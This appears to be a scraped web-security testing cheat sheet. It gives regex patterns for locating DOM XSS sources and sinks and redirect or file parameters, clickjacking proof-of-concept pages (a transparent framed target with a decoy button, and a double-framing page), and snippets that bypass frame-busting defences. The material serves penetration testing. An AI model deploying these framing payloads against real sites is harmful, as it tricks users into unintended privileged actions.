Copy document.URL|document.documentURI|document.URLUnencoded|document.baseURI|location.search|document.cookie|document.referrer|location.
Copy document . write\( | document . writeln\( | document . domain | \w \.innerHTML | \w \.outerHTML | \w \.insertAdjacentHTML | \w \.onevent
Copy [?&] ( url | link | redirect | target | site | page | navigate | ref | callback | host | return | next | returnurl | redirectUrl ) =
Copy [?&] ( file | path | document | folder | dir | download | resource | view | load | template | img | image ) = | . src=
Copy <!-- clickjacking.html: -->
< html >
< head >
< title >Clickjack test page</ title >
</ head >
< body >
< h1 >Website is vulnerable to clickjacking attacks!</ h1 >
< p >Embebed in a iframe for clickjackings attacks</ p >
< p >Authenticated page with privilege actions</ p >
<input type="button" value="Vulnerable" style="position:absolute;top:280;left:450;background-color:red;color:white;padding: 10px 15px;">
<iframe src="https://example.com/" style="opacity:0.5; filter:alpha(opacity=30)" width="1500" height="1000"></iframe>
</ body >
</ html >
Copy <!-- Attacker’s top frame (pre-clickjacking.html): -->
< h1 >Double Framing Attack (First Frame)</ h1 >
< iframe src = "clickjacking.html" width = "3000" height = "2000" ></ iframe >
Copy < iframe src = "http://example.org" security = "restricted" ></ iframe >
Copy < iframe src = "http://example.org" sandbox ></ iframe >
Copy < h1 >www.fictitious.site</ h1 >
< script >
window . onbeforeunload = function ()
{
return " Do you want to leave fictitious.site?" ;
}
</ script >
< iframe src = "http://example.org" >